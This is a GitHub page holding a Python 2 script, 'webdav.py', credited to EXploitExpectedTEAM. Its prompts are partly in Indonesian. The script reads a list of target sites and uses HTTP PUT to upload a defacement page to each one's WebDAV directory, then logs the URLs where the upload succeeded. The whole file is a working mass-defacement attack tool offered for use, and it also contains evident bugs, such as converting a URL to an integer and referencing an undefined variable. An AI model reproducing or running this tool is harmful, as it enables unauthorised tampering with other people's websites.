-
Notifications
You must be signed in to change notification settings - Fork 0
/
webdav.py
74 lines (69 loc) · 2.07 KB
/
webdav.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
#!/usr/bin/python
###########################################
# Mr.541NT-3DUNT | EXploitExpectedTEAM #
# Mr.X173N1 | EXploitExpectedTEAM #
# Mr.CYB3R_4RTz | EXploitExpectedTEAM #
# Versailles | sec7or #
# WebDAV Exploit ( Python ) #
# Coded By Mr.541NT-3DUNT #
# Forum : www.exploitexpectedteam.gq #
# Dont Change Copyright!! #
###########################################
import requests
import string
import sys
import os
from urllib2 import Request, urlopen, URLError, HTTPError
os.system("clear")
print """
_ __ __ ____
| | / /__ / /_ / __ \____ __ __
| | /| / / _ \/ __ \/ / / / __ `/ | / /
| |/ |/ / __/ /_/ / /_/ / /_/ /| |/ /
|__/|__/\___/_.___/_____/\__,_/ |___/"""
if len(sys.argv) != 2:
print '\nUsage : '+sys.argv[0]+' ScDeface.htm\n'
sys.exit(0)
with open(sys.argv[1], 'rb') as f:
s = f.read()
setan = s
print("""
[*] WebDAV Exploiter File Upload
[*] EXploitExpectedTEAM
[*] Coded By Mr.541NT-3DUNT
""")
ss = raw_input("Masukan Target List:")
t = open(ss ,'r')
bes = raw_input("Masukan Save Files:")
becas = sys.argv[1]
def scan():
while True:
print( 30 * '=')
su = t.readline()
su = su.replace("\n","")
if su[:7] != "http://":
su = "http://"+su
else:
su = int(su)
output = "/"+becas
sa = su + output
print '\n[*] Uploading File Ke Target'
print '[*] Kirim %d byte, Ke Target...' % len(becas)
print 'Upload to ' + sa
r = requests.put(str(sa), data=setan, headers={'Content-Type':'application/octet-stream'})
s = r.status_code
print(r)
print("Statu code: "+ str(s) )
if r.status_code < 200 or r.status_code >= 300:
print '[!] Upload Gagal... '
else:
print('[*] File Sukses Terupload...')
sundel = sa + "\n"
print('[*] Path : '+sa)
c = open(bes, 'a')
c.write(sa + "\n")
c.close()
print ""
scan()
print('File Saved On: '+bas+'/'+bes)